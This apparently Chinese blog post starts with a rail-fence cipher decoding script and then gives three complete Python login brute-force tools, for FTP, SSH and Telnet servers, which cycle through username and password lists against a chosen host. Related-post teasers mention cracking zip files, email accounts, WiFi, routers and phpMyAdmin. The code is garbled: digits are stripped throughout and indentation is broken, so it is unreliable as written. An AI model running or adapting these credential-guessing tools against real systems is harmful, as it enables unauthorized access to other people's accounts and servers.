Python脚本暴力破解栅栏密码

今天遇到一个要破解的栅栏密码,先给大家介绍通用的脚本。

方法一(通用脚本):

#!/usr/bin/env python
 # -*- coding: gbk -*-
 # -*- coding: utf_ -*-
 e = raw_input(‘请输入要解密的字符串\n‘)
 elen = len(e)
 field=[]
 for i in range(,elen):
       if(elen%i==):
         field.append(i)
 for f in field:
   b = elen / f
   result = {x:‘‘ for x in range(b)}
   for i in range(elen):
     a = i % b;
     result.update({a:result[a] + e[i]})
   d = ‘‘
   for i in range(b):
     d = d + result[i]
   print ‘分为\t‘+str(f)+‘\t‘+‘栏时,解密结果为: ‘+d

方法二:

FTP暴力破解脚本

#!/usr/bin/env python
#-*-coding = utf--*-
#author:@xfk
#blog:@blog.sina.com.cn/kaiyongdeng
#date:@--
import sys, os, time
from ftplib import FTP
docs = """
      [*] This was written for educational purpose and pentest only. Use it at your own risk.
      [*] Author will be not responsible for any damage!
      [*] Toolname : ftp_bf.py
      [*] Coder :
      [*] Version : .
      [*] eample of use : python ftp_bf.py -t ftp.server.com -u usernames.txt -p passwords.txt
    """
if sys.platform == 'linux' or sys.platform == 'linux':
  clearing = 'clear'
else:
  clearing = 'cls'
os.system(clearing)
R = "\[m";
G = "\[m";
Y = "\[m"
END = "\[m"
def logo():
  print G+"\n |---------------------------------------------------------------|"
  print " | |"
  print " | blog.sina.com.cn/kaiyongdeng |"
  print " | // ftp_bf.py v.. |"
  print " | FTP Brute Forcing Tool |"
  print " | |"
  print " |---------------------------------------------------------------|\n"
  print " \n [-] %s\n" % time.strftime("%X")
  print docs+END
def help():
  print R+"[*]-t, --target ip/hostname <> Our target"
  print "[*]-u, --usernamelist usernamelist <> usernamelist path"
  print "[*]-p, --passwordlist passwordlist <> passwordlist path"
  print "[*]-h, --help help <> print this help"
  print "[*]Example : python ftp_bf -t ftp.server.com -u username.txt -p passwords.txt"+END sys.exit()
def bf_login(hostname,username,password):
  # sys.stdout.write("\r[!]Checking : %s " % (p))
  # sys.stdout.flush()
  try:
    ftp = FTP(hostname)
    ftp.login(hostname,username, password)
    ftp.retrlines('list')
    ftp.quit()
    print Y+"\n[!] wt,wt!!! We did it ! "
    print "[+] Target : ",hostname, ""
    print "[+] User : ",username, ""
    print "[+] Password : ",password, ""+END
    return
  # sys.exit()
  except Exception, e:
    pass except KeyboardInterrupt: print R+"\n[-] Exiting ...\n"+END
  sys.exit()
def anon_login(hostname):
  try:
    print G+"\n[!] Checking for anonymous login.\n"+END
    ftp = FTP(hostname) ftp.login()
    ftp.retrlines('LIST')
    print Y+"\n[!] wt,wt!!! Anonymous login successfuly !\n"+END
    ftp.quit()
  except Exception, e:
    print R+"\n[-] Anonymous login failed...\n"+END
    pass
def main():
  logo()
  try:
    for arg in sys.argv:
      if arg.lower() == '-t' or arg.lower() == '--target':
        hostname = sys.argv[int(sys.argv[:].index(arg))+]
      elif arg.lower() == '-u' or arg.lower() == '--usernamelist':
        usernamelist = sys.argv[int(sys.argv[:].index(arg))+]
      elif arg.lower() == '-p' or arg.lower() == '--passwordlist':
        passwordlist = sys.argv[int(sys.argv[:].index(arg))+]
      elif arg.lower() == '-h' or arg.lower() == '--help':
        help()
      elif len(sys.argv) <= :
        help()
  except:
    print R+"[-]Cheak your parametars input\n"+END
    help()
  print G+"[!] BruteForcing target ..."+END
  anon_login(hostname)
  # print "here is ok"
  # print hostname
  try:
    usernames = open(usernamelist, "r")
    user = usernames.readlines()
    count =
    while count < len(user):
      user[count] = user[count].strip()
      count +=
  except:
    print R+"\n[-] Cheak your usernamelist path\n"+END
    sys.exit()
  # print "here is ok ",usernamelist,passwordlist
  try:
    passwords = open(passwordlist, "r")
    pwd = passwords.readlines()
    count =
    while count < len(pwd):
      pwd[count] = pwd[count].strip()
      count +=
  except:
    print R+"\n[-] Check your passwordlist path\n"+END
    sys.exit()
  print G+"\n[+] Loaded:",len(user),"usernames"
  print "\n[+] Loaded:",len(pwd),"passwords"
  print "[+] Target:",hostname
  print "[+] Guessing...\n"+END
  for u in user: for p in pwd:
    result = bf_login(hostname,u.replace("\n",""),p.replace("\n",""))
    if result != :
      print G+"[+]Attempt uaername:%s password:%s..." % (u,p) + R+"Disenable"+END
    else:
      print G+"[+]Attempt uaername:%s password:%s..." % (u,p) + Y+"Enable"+END
    if not result :
      print R+"\n[-]There is no username ans password enabled in the list."
      print "[-]Exiting...\n"+END
if __name__ == "__main__":
  main()

SSH暴力破解

#!/usr/bin/env python
#-*-coding = UTF--*-
#author@:dengyongkai
#blog@:blog.sina.com.cn/kaiyongdeng
import sys
import os
import time
#from threading import Thread
try:
  from paramiko import SSHClient
  from paramiko import AutoAddPolicy
except ImportError:
  print G+'''
  You need paramiko module.
http://www.lag.net/paramiko/
  Debian/Ubuntu: sudo apt-get install aptitude
     : sudo aptitude install python-paramiko\n'''+END
  sys.exit()
docs = """
      [*] This was written for educational purpose and pentest only. Use it at your own risk.
      [*] Author will be not responsible for any damage!
      [*] Toolname    : ssh_bf.py
      [*] Author     : xfk
      [*] Version     : v..
      [*] Example of use : python ssh_bf.py [-T target] [-P port] [-U userslist] [-W wordlist] [-H help]
  """
if sys.platform == 'linux' or sys.platform == 'linux':
     clearing = 'clear'
else:
     clearing = 'cls'
os.system(clearing)
R = "\[m";
G = "\[m";
Y = "\[m"
END = "\[m"
def logo():
     print G+"\n        |---------------------------------------------------------------|"
     print "        |                                |"
     print "        |        blog.sina.com.cn/kaiyongdeng          |"
     print "        |        // ssh_bf.py v..           |"
     print "        |         SSH Brute Forcing Tool            |"
     print "        |                                |"
     print "        |---------------------------------------------------------------|\n"
     print " \n           [-] %s\n" % time.ctime()
     print docs+END
def help():
  print Y+"    [*]-H    --hostname/ip    <>the target hostname or ip address"
  print "   [*]-P    --port     <>the ssh service port(default is )"
  print "   [*]-U    --usernamelist   <>usernames list file"
  print "   [*]-P    --passwordlist   <>passwords list file"
  print "   [*]-H    --help     <>show help information"
  print "   [*]Usage:python %s [-T target] [-P port] [-U userslist] [-W wordlist] [-H help]"+END
  sys.exit()
def BruteForce(hostname,port,username,password):
    '''
    Create SSH connection to target
    '''
    ssh = SSHClient()
    ssh.set_missing_host_key_policy(AutoAddPolicy())
    try:
      ssh.connect(hostname, port, username, password, pkey=None, timeout = None, allow_agent=False, look_for_keys=False)
      status = 'ok'
      ssh.close()
    except Exception, e:
      status = 'error'
      pass
  return status
def makelist(file):
  '''
  Make usernames and passwords lists
  '''
  items = []
  try:
    fd = open(file, 'r')
  except IOError:
    print R+'unable to read file \'%s\'' % file+END
    pass
  except Exception, e:
    print R+'unknown error'+END
    pass
  for line in fd.readlines():
    item = line.replace('\n', '').replace('\r', '')
    items.append(item)
  fd.close()
  return items
def main():
    logo()
#  print "hello wold"
    try:
        for arg in sys.argv:
            if arg.lower() == '-t' or arg.lower() == '--target':
                hostname = str(sys.argv[int(sys.argv[:].index(arg))+])
        if arg.lower() == '-p' or arg.lower() == '--port':
          port = sys.argv[int(sys.argv[:].index(arg))+]
            elif arg.lower() == '-u' or arg.lower() == '--userlist':
                userlist = sys.argv[int(sys.argv[:].index(arg))+]
            elif arg.lower() == '-w' or arg.lower() == '--wordlist':
                wordlist = sys.argv[int(sys.argv[:].index(arg))+]
            elif arg.lower() == '-h' or arg.lower() == '--help':
                help()
      elif len(sys.argv) <= :
                help()
    except:
        print R+"[-]Cheak your parametars input\n"+END
        help()
    print G+"\n[!] BruteForcing target ...\n"+END
#    print "here is ok"
#    print hostname,port,wordlist,userlist
    usernamelist = makelist(userlist)
    passwordlist = makelist(wordlist)
    print Y+"[*] SSH Brute Force Praparing."
    print "[*] %s user(s) loaded." % str(len(usernamelist))
    print "[*] %s password(s) loaded." % str(len(passwordlist))
    print "[*] Brute Force Is Starting......."+END
  try:
      for username in usernamelist:
        for password in passwordlist:
        print G+"\n[+]Attempt uaername:%s password:%s..." % (username,password)+END
            current = BruteForce(hostname, port, username, password)
              if current == 'error':
          print R+"[-]O*O The username:%s and password:%s Is Disenbabled...\n" % (username,password)+END
#                pass
              else:
                  print G+"\n[+] ^-^ HaHa,We Got It!!!"
                  print "[+] username: %s" % username
                  print "[+] password: %s\n" % password+END
#                  sys.exit()
  except:
    print R+"\n[-] There Is Something Wrong,Pleace Cheak It."
    print "[-] Exitting.....\n"+END
    raise
    print Y+"[+] Done.^-^\n"+END
    sys.exit()
if __name__ == "__main__":
  main()

TELNET密码暴力破解

#!usr/bin/python
#Telnet Brute Forcer
#http://www.darkcde.com
#dhydr[at]gmail[dot]com
import threading, time, random, sys, telnetlib
from copy import copy
if len(sys.argv) !=:
  print "Usage: ./telnetbrute.py <server> <userlist> <wordlist>"
  sys.exit()
try:
  users = open(sys.argv[], "r").readlines()
except(IOError):
  print "Error: Check your userlist path\n"
  sys.exit()
try:
  words = open(sys.argv[], "r").readlines()
except(IOError):
  print "Error: Check your wordlist path\n"
  sys.exit()
print "\n\t  dhydr[at]gmail[dot]com TelnetBruteForcer v."
print "\t--------------------------------------------------\n"
print "[+] Server:",sys.argv[]
print "[+] Users Loaded:",len(users)
print "[+] Words Loaded:",len(words),"\n"
wordlist = copy(words)
def reloader():
  for word in wordlist:
    words.append(word)
def getword():
  lock = threading.Lock()
  lock.acquire()
  if len(words) != :
    value = random.sample(words, )
    words.remove(value[])
  else:
    print "\nReloading Wordlist - Changing User\n"
    reloader()
    value = random.sample(words, )
    users.remove(users[])
  lock.release()
  if len(users) ==:
    return value[][:-], users[]
  else:
    return value[][:-], users[][:-]
class Worker(threading.Thread):
  def run(self):
    value, user = getword()
    try:
      print "-"*
      print "User:",user,"Password:",value
      tn = telnetlib.Telnet(sys.argv[])
      tn.read_until("login: ")
      tn.write(user + "\n")
      if password:
          tn.read_until("Password: ")
          tn.write(value + "\n")
      tn.write("ls\n")
      tn.write("exit\n")
      print tn.read_all()
      print "\t\nLogin successful:",value, user
      tn.close()
      work.join()
      sys.exit()
    except:
      pass
for I in range(len(words)*len(users)):
  work = Worker()
  work.start()
  time.sleep()
(0)

相关推荐

  • Python压缩解压缩zip文件及破解zip文件密码的方法

    python 的 zipfile 提供了非常便捷的方法来压缩和解压 zip 文件. 例如,在py脚本所在目录中,有如下文件: readability/readability.js readability/readability.txt readability/readability-print.css readability/sprite-readability.png readability/readability.css 将 readability 目录中的文件压缩到脚本所在目录的 read

  • Python写的PHPMyAdmin暴力破解工具代码

    PHPMyAdmin暴力破解,加上CVE-2012-2122 MySQL Authentication Bypass Vulnerability漏洞利用. #!/usr/bin/env python import urllib import urllib2 import cookielib import sys import subprocess def Crack(url,username,password): opener = urllib2.build_opener(urllib2.HTT

  • 忘记ftp密码使用python ftplib库暴力破解密码的方法示例

    python具体强大的库文件,很多功能都有相应的库文件,所以很有必要进行学习一下,其中有一个ftp相应的库文件ftplib,我们只需要其中的登录功能,然后利用多线程调用相应字典里面的字段进行登录,还能根据自己的需要,根据自身的情况编写需要的程序,让程序代替我们去做一些枯燥的重复工作. 下面直接上代码,下面是主文件 复制代码 代码如下: import os import time import threading class mythread(threading.Thread): def __in

  • python编写暴力破解FTP密码小工具

    python具体强大的库文件,很多功能都有相应的库文件,所以很有必要进行学习一下,其中有一个ftp相应的库文件ftplib,我们只需要其中的登录功能,然后利用多线程调用相应字典里面的字段进行登录,还能根据自己的需要,根据自身的情况编写需要的程序,让程序代替我们去做一些枯燥的重复工作. 下面直接上代码,下面是主文件 复制代码 代码如下: import os import time import threading class mythread(threading.Thread): def __in

  • python实现多线程暴力破解登陆路由器功能代码分享

    运行时请在其目录下添加user.txt passwd.txt两文件.否则会报错.程序没有加异常处理.代码比较挫..... 复制代码 代码如下: #coding:utf-8- import base64 import urllib2 import Queue import threading,re,sys queue = Queue.Queue() class Rout_thread(threading.Thread): def __init__(self,queue,passwd): threa

  • Python实现在线暴力破解邮箱账号密码功能示例【测试可用】

    本文实例讲述了Python实现在线暴力破解邮箱账号密码功能.分享给大家供大家参考,具体如下: dic 字典格式如下(mail.txt) : username@gmail.com:password username@gmail.com:password username@gmail.com:password 以此类推,切记保存成utf-8编码格式. 放置在当前脚本目录,也可自己定义修改. 支持ssl https /imap协议. # version 3.4.0 # coding='UTF-8' #

  • Python脚本暴力破解栅栏密码

    今天遇到一个要破解的栅栏密码,先给大家介绍通用的脚本. 方法一(通用脚本): #!/usr/bin/env python # -*- coding: gbk -*- # -*- coding: utf_ -*- e = raw_input('请输入要解密的字符串\n') elen = len(e) field=[] for i in range(,elen): if(elen%i==): field.append(i) for f in field: b = elen / f result =

  • Python实现暴力破解wifi密码并打包成exe

    目录 前言 功能点预览 前置准备-依赖库 Python tkinter编写GUI界面 密码字典 开撸 打包成exe 演示 PS 前言 python号称是编程界的万金油,那么是否可以做个读取电脑网卡wifi并暴力破解的小脚本呢?在这个基础上为了方便体验是不是可以将其打包成exe这样方便执行的小应用呢? 说干就干~ 功能点预览 本文主要分享以下需求 python获取无线网卡 python通过无线网卡获取wifi python暴力破解wifi python 通过实现GUI图形界面 python打包成e

  • Python实现暴力破解有密码的zip文件的方法

    背景 今天朋友给我发了一个某游戏的兑换码,压缩文件发过来的.结果被加密了.wc?还说叫爸爸就给我密码?男人是这么容易像恶势力低头的?直接给你爆了好吧,小兔崽子. 一.思路 爆密码的思路其实都大同小异:无非就是字典爆破,就看你是有现成密码字典,还是自己生成密码字典,然后进行循环输入密码,直到输入正确位置.现在很多都有防爆破限制,根本无法进行暴力破解,但是似乎zip这种大家都是用比较简单的密码而且没有什么限制. 因此 实现思路就是 生成字典->输入密码->成功解压 二.实现过程 1.生成字典 生成

  • python编写暴力破解zip文档程序的实例讲解

    编写暴力破解Zip文件要从学习zipfile库的使用方法入手,首先打开Python解释器,用help('zipfile')命令来了解这个库并重点看一下ZipFile类中的extractall()这个方法 ZipFile extractall() 让我们来写一个脚本测试一下Zip文件库的用法,首先创建一个有密码的压缩文件,这里设置密码为awd,文件名为evil.zip,要解压这个zip文件,实例化一个新的ZipFile类,使用extractall()方法,在可选参数pwd上填上密码 运行后你会发现

  • Java编程实现暴力破解WIFI密码的方法分析

    本文实例讲述了Java编程实现暴力破解WIFI密码的方法.分享给大家供大家参考,具体如下: 开始进入正题.在网上找了很多wifi破解工具,都是linux平台下用的,然后还不支持虚拟机装linux.因为很多笔记本装虚拟机都识别不了内置网卡.所以得把系统刻到U盘,然后用U盘启动.但是我现在穷得连一条内裤都没有了,哪来的U盘啊.于是就决定自己写,而且还得用Java写,写了我还得在windows上运行. 一.准备工作 首先你得需要一台能连wifi的电脑, 然后你的电脑得支持Java环境, 最后你周围得有

  • Python利用字典破解WIFI密码的方法

    最近看到网上的一些作品,然后进行一些完善.只是用于学习,不要去干坏事哦.程序来源于网,我只是做了一些优化.当然这种方法破解还是有点慢哦.我用的python 3.6.5 既然要破解wifi,那么连接wifi的模块首先要有的,我们要导入pywifi模块. 有些同学可能没有这个,如果直接通过pip安装的话,可能不能用,听说这个wifi模块被停用了,所以大家如果通过pip安装的不行,那么就下载我提供的. 链接:https://pan.baidu.com/s/1rn-5F1CS5UXOTcLh3QAMhg

  • Python中FTP服务与SSH登录暴力破解的实现

    目录 前言 SSH爆破 脚本演示 信号量类 with 用法 FTP爆破 服务搭建 匿名扫描 暴力破解 总结 前言 本文继续学习下 Python 编程在网络攻防领域的应用,主要是通过 Python 脚本进行 SSH 登录爆破和 FTP 服务登录爆破. SSH爆破 演示环境借助 Kali 虚拟机进行自身的 SSH 服务的登录爆破,注意提前修改/etc/ssh/sshd_config配置文件并执行命令service ssh start运行 SSH 服务. 脚本演示 先来看看代码: from pexpe

  • python生成遍历暴力破解密码的方法

    python生成遍历暴力破解密码(这里已遍历暴力破解rar为例,只提供生成密码以及遍历密码) 这个也就是提供一个思路,需求是这样的,我XX的闺蜜有个rar的压缩包,不知道他是从哪里挣来的,说这个对他比较重要,但是有密码打不开,唉,可怜了我的电脑了 因为这个是暴力破解,是吧所有的密码进行的遍历,也就是从1到....无穷的列举出来,然后按个密码去撞,撞开了就开了,建议大家买个云服务器进行破解哈,因像这种的第一,不知道密码是几位的,第二还有特殊符号的,唉,破解时间太长了,就用8位密码来说把,全部8位测

随机推荐